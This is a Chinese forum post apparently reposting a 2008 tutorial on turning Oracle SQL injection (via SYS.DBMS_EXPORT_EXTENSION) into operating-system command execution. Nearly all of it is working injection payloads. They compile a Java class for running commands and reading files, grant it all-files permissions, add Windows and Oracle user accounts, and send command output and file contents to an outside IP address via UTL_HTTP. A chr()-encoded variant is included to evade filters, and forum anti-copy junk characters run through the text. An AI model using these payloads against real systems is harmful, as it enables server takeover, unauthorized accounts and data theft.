找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 实例演示oracle注入获取cmdshell的全过程
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2497|回复: 0
打印 上一主题 下一主题

实例演示oracle注入获取cmdshell的全过程

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 1 X. \+ o: k  D7 ]9 {! }
/ |! W$ \8 }; {( U' f7 L
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
8 D/ {$ z( D2 ~4 K/ n的形式即可。(用" 'a'|| "是为了让语句返回true值)
( P* T/ p! q$ r2 W语句有点长,可能要用post提交。
: n4 J  A- u3 a% ]# M9 k以下是各个步骤:
$ l% i4 F3 Q3 @+ ?) a# I! [1.创建包   }8 V- g1 l5 r0 ]% |2 [
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:, b( ?; c1 j* K. d9 }7 c$ n5 w
/xxx.jsp?id=1 and '1'<>'a'||( ( P  R2 b% ~; U# M3 R# |- O) E
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
& S4 }5 S7 c% U) n0 K2 ^# Zcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
$ L# p# Y6 g, h1 W' n4 T$ r3 o! Vnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
8 e5 R5 b! L3 j5 A  ~$ f}'''';END;'';END;--','SYS',0,'1',0) from dual
, P+ ?; J% j! R8 p1 v8 G)
) |# y) D! _8 w$ ?' W------------------------ 9 a  v$ M( z/ f2 W1 G
如果url有长度限制,可以把readFile()函数块去掉,即: . ~: L4 f  R7 {5 P
/xxx.jsp?id=1 and '1'<>'a'||( ( B! z5 E6 U) N6 t$ J! l
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
- x" j' p* J* s$ a- R! m& [create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(+ y7 c- }( B- z+ p7 |  |
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
2 U: {- x! D1 o& V7 S# H6 v}'''';END;'';END;--','SYS',0,'1',0) from dual + t! y( Q' E. ]; r
) - `" _4 W8 T! z
同时把后面步骤 提到的 对readFile()的处理语句去掉。 , G3 U- o6 ~. }
------------------------------ 3 F0 W- `' w8 ~- O& f* Q3 r
2.赋Java权限 . D2 ~. c) e4 ^( ?3 ]2 f2 K+ J1 D; U/ G
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
; ?! d; a2 {  t% w0 N4 j' D% V3.创建函数
: E8 ?, a  N- O0 c& r# B1 K( \5 T6 Zselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''5 p3 `. V  ?1 m' m* i
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
+ ]3 k1 e+ y( F2 y6 j# Bselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''; @7 Q0 v# s4 Z& y( k
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
8 G7 |1 @4 v8 b0 M3 h% ^4.赋public执行函数的权限 " ~  }; W% d2 Z# A& p& b
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
2 w8 B+ ]1 z% ~& m0 q) X2 g' @select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual$ O/ Y# X" r! E* r5 H
5.测试上面的几步是否成功 . g, S8 J8 }$ F9 F7 l
and '1'<>'11'||(
4 h" v. p" o( n) ]" C' Iselect  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' $ ]2 [: X8 l) M- z* c
)
. d6 \4 v2 G7 Vand '1'<>( ! Q  J/ N- ^* Y
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
, ~' k6 e! ~7 i; i( }& D) $ Y- n/ m! C" B% B
6.执行命令:
) a2 E, w+ Z4 C( j% @6 u/xxx.jsp?id=1 and '1'<>( & V& a( g9 b# v5 X; I
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual , C# q5 c4 B0 _, p

, p% c3 Y, F# j) E% }3 y6 E)
- Y0 K# `/ s1 L8 o3 L/xxx.jsp?id=1 and '1'<>(
) c/ M5 X/ y8 C, i+ g0 n  _  Yselect  sys.LinxReadFile('c:/boot.ini') from dual! _/ c& T; i4 D: t+ y
9 }  G! O1 t% u" ]- K
)- E9 _8 _* x0 ~8 R
  1 p$ F# J1 T& v1 |% [
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
8 y" m: ?' x2 d2 o% E/ T- t  E, n如果要查看运行结果可以用 union :
& X: _& Z, G8 j0 E% B$ n/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
% Y; y" n) O( c3 _或者UTL_HTTP.request(:
0 M* H, z9 C# {  Z5 r8 C/xxx.jsp?id=1 and '1'<>(
8 H) J& _0 ]3 y& ZSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
# D- J9 y* p) e" h' F" [) 0 K7 v' ^7 p0 q3 k
/xxx.jsp?id=1 and '1'<>( 2 \: Q% T- J3 m' x' U- i
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual8 z* }7 `& m) @8 S+ r" S* [( o
)
: l3 ?. h# Q8 q2 I' [注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。" {2 B6 n* f4 C0 v0 C% U3 G0 m# Z& d
-------------------- 9 `. O6 `1 z, e, p4 v# G
6.内部变化 # A. n3 R- b% ?9 g3 a
通过以下命令可以查看all_objects表达改变:
( k5 b" I, M4 @& M9 S, @7 rselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'$ ~8 |+ T7 T; V2 T9 b) J
7.删除我们创建的函数 % }/ ?  N. W( g
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''3 B( E+ X8 e- f; e
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual 0 g- ]& P% a1 p- A1 E" a( S
====================================================
. J8 m; e$ ^. C& y1 A- k: U全文结束。谨以此文赠与我的朋友。 . n% q* R' z7 I" T0 B" e+ p
linx
0 ^$ @: G0 ?- i$ }124829445
; |  }4 i: Q! a, d5 C2008.1.12 ( @) w& e7 V' d* ?$ e) B  ?
linyujian@bjfu.edu.cn ; n1 @$ x& l7 a& k  I( k! I1 K
======================================================================
: P2 C$ @2 z) u8 D# Y) o9 c测试漏洞的另一方法:
. i' E  M5 q! M创建oracle帐号: ) ?: o5 b8 E: l$ b# j
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''8 p3 }3 b" ^! C+ ?7 N- a
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
8 T# Y8 @. a% p# U$ ]7 {) V即:
! m8 M; L, j5 Iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
8 ?: A0 v3 N+ e# p/ ^& w) R/ g7 ichr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
. z# l  n& S) P  h9 t确定漏洞存在: 2 ~" I/ J8 Z2 \7 w% t
1<>(
; X# u1 m: v: cselect user_id from all_users where username='LINXSQL'
, z- ?) l+ U# q. y7 Z9 d6 b- J)
% F1 g* H5 s4 C: J6 s给linxsql连接权限:
3 R* H5 X0 W$ a1 {select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
, w1 q1 y1 s7 [& x; R/ ZGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
' z5 _) Z& Q7 R2 V9 R/ X" ?' S5 N删除帐号:
, ~* S4 m$ q6 X; D# Aselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''5 O, u6 L8 Q3 Z/ {( [6 a
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
+ u9 P6 M* O. R' y( F======================
; g# U- _7 J  ?+ f以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
/ z! `6 c& I8 i& F9 S1.jsp?id=1 and '1'<>(
( d, K$ a8 N1 y6 A% rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 k% S( `; a$ U6 Ucreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
/ B& s* R2 ^$ Z8 c7 s) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE& Z" H5 @7 H" }+ f  [& y# ?9 e
 )
% b- f4 a7 ]( o) ^) m9 i
! \& s9 C! F7 p: A* Q% r2 H; l, b" K8 n) j8 G
6 _* K3 J* E$ u8 j1 A/ U4 b
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表